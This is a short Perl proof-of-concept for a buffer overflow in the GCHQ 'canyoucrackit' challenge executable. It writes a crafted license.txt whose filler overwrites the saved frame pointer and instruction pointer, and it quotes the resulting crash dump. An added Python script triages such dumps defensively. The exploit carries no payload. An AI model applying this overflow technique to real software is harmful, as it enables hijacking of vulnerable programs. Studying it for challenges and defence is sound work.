###
# GCHQ canyoucrackit challenge and vulnerable binary for the win!
# save and run perl poc.pl in the same directory as the GCHQ 
# canyoucrackit executable which can be obtained by visiting 
# the super secret url below.
# 
# URL: http://canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe
# the binary will create a stackdump when it crashes. 
# you will need cygwin1.dll and cygcrypt-0.dll to run the binary.
#
# Anyone else catch this? :)))
# 
# PoC just for fun 
# Dillon Beresford
# twitter.com/D1N
###

###
# Exception: STATUS_ACCESS_VIOLATION at eip=44444444
# eax=FFFFFFFF ebx=0022CD50 ecx=611663A0 edx=00000000 esi=0022CD75 edi=00000000
# ebp=42424242 esp=0022CD30 program=C:\Documents and Settings\tester\Desktop\gchq_owned_eip_42424242\da75370fe15c4148bd4ceec861fbdaa5.exe, pid 3364, thread main
# cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
###

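use strict;
use warnings;

# Output file, written next to the executable.
my $exploit = "license.txt";

my $junk = "\x41" x 56;        # 56 bytes of filler
my $ebp = "\x42" x 4;          # shows up as ebp=42424242 in the dump above

my $eip = "\x44\x44\x44\x44";  # shows up as eip=44444444 in the dump above

my $payload = $junk.$ebp.$eip;

# Lexical filehandle and three-argument open, with an error check.
open(my $fh, '>', $exploit) or die "cannot open $exploit: $!";
print $fh $payload;
close($fh);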
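
A crash-triage check for the stackdump quoted above, as an added example that is not part of the original PoC: it parses the register lines and flags any register whose four bytes are one repeated printable character, which is how file contents overwriting the saved frame pointer and return address show up in a dump. The function names and the abridged sample dump are constructed for illustration.

```python
import re

# Constructed sample: the register lines from the stackdump on this page,
# with the program path abridged to the file name.
SAMPLE_DUMP = """\
Exception: STATUS_ACCESS_VIOLATION at eip=44444444
eax=FFFFFFFF ebx=0022CD50 ecx=611663A0 edx=00000000 esi=0022CD75 edi=00000000
ebp=42424242 esp=0022CD30 program=da75370fe15c4148bd4ceec861fbdaa5.exe, pid 3364, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
"""

# 32-bit general-purpose registers plus eip, each followed by 8 hex digits.
REG_RE = re.compile(r"\b(e(?:ax|bx|cx|dx|si|di|bp|sp|ip))=([0-9A-Fa-f]{8})\b")


def parse_registers(dump):
    """Return {register: value} for the 32-bit registers in a stackdump."""
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}


def looks_like_filler(value):
    """True when all four bytes are the same printable ASCII character."""
    raw = value.to_bytes(4, "little")
    return len(set(raw)) == 1 and 0x20 <= raw[0] <= 0x7E


def triage(dump):
    """Return ({register: filler char}, verdict) for one crash dump."""
    regs = parse_registers(dump)
    tainted = {r: chr(v & 0xFF) for r, v in regs.items() if looks_like_filler(v)}
    if "eip" in tainted:
        verdict = "control-flow hijack: eip holds input bytes"
    elif tainted:
        verdict = "memory corruption: registers hold input bytes"
    else:
        verdict = "no input pattern in registers"
    return tainted, verdict


if __name__ == "__main__":
    tainted, verdict = triage(SAMPLE_DUMP)
    print(verdict)
    for reg, ch in sorted(tainted.items()):
        print(f"  {reg} = 4 x {ch!r}")
```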